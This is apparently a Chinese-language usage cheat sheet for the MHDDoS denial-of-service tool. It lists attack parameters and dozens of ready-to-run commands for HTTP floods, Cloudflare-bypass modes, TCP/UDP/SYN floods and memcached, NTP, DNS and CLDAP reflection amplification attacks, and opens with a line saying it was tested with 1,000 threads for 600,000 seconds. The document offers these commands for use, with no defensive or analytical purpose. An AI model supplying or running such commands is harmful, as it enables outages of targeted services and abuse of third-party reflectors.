测试可用 python3 /root/MHDDoS/start.py tcp 1.2.3.4:80 1000 600000
| 参数 | 说明 | 示例值 |
|---|---|---|
| method | 攻击方法名称 | get/post/ovh等 |
| url | 目标URL(HTTP层) | https://example.com |
| ip:port | 目标地址(网络层) | 192.168.1.1:80 |
| socks_type | 0=全部代理, 1=HTTP, 4=SOCKS4, 5=SOCKS5, 6=随机 | 1 |
| threads | 并发线程数 | 1000 |
| rpc | 每线程请求数(Requests Per Connection) | 100 |
| duration | 持续时间(秒) | 60 |
python3 start.py get https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py post https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py ovh https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py rhex https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py stomp https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py stress https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py dyn https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py downloader https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py slow https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py head https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py null https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py cookie https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py pps https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py even https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py gsb https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py dgb https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py avb https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py bot https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py apache https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py xmlrpc https://example.com/xmlrpc.php 1 1000 proxies/http.txt 100 60
python3 start.py cfb https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py cfbuam https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py bypass https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py bomb https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py killer https://example.com 1 1000 proxies/http.txt 100 60
python3 start.py tor http://example.onion 1 1000 proxies/http.txt 100 60
普通格式: python3 start.py <method> <ip:port> <threads> <duration>
代理格式: python3 start.py <method> <ip:port> <threads> <duration> <socks_type> <proxylist>
放大攻击: python3 start.py <method> <ip:port> <threads> <duration> <reflector_file>
python3 start.py tcp 192.168.1.1:80 1000 60
python3 start.py udp 192.168.1.1:80 1000 60
python3 start.py syn 192.168.1.1:80 1000 60
python3 start.py cps 192.168.1.1:80 1000 60 1 proxies/http.txt
python3 start.py icmp 192.168.1.1 1000 60
python3 start.py connection 192.168.1.1:80 1000 60 1 proxies/http.txt
python3 start.py vse 192.168.1.1:27015 1000 60
python3 start.py ts3 192.168.1.1:9987 1000 60
python3 start.py fivem 192.168.1.1:30120 1000 60
python3 start.py mem 192.168.1.1:11211 1000 60 reflectors/memcached.txt
python3 start.py ntp 192.168.1.1:123 1000 60 reflectors/ntp.txt
python3 start.py mcbot 192.168.1.1:25565 1000 60
python3 start.py minecraft 192.168.1.1:25565 1000 60
python3 start.py mcpe 192.168.1.1:19132 1000 60
python3 start.py dns 192.168.1.1:53 1000 60 reflectors/dns.txt
python3 start.py char 192.168.1.1:19 1000 60 reflectors/chargen.txt
python3 start.py cldap 192.168.1.1:389 1000 60 reflectors/cldap.txt
python3 start.py ard 192.168.1.1:3283 1000 60 reflectors/ard.txt
python3 start.py rdp 192.168.1.1:3389 1000 60 reflectors/rdp.txt
python3 start.py tools
python3 start.py cfip https://example.com
python3 start.py dns example.com
python3 start.py tssrv example.com
python3 start.py ping 192.168.1.1
python3 start.py check https://example.com
python3 start.py dstat
python3 start.py stop
python3 start.py help
python3 start.py info
top命令监控pip3 install --upgrade requests urllib3 charset-normalizer